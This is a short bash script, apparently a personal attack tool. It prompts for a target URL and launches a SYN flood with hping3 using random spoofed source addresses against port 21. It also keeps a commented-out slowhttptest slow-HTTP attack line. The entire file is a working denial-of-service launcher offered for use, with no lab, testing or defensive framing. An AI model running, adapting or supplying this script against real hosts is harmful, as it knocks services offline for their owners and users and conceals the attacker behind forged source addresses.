#!/bin/bash

echo "================================================"
echo "       Hping3 - Denial Of Service Attack        "
echo "================================================"

echo

echo
echo -n "DOS URL: "
read url

hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source $url

#slowhttptest -c 1000 -H -g -o slowhttp -i 10 -r 200 -t GET -u $url -x 24 -p 3

echo "hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source $url"



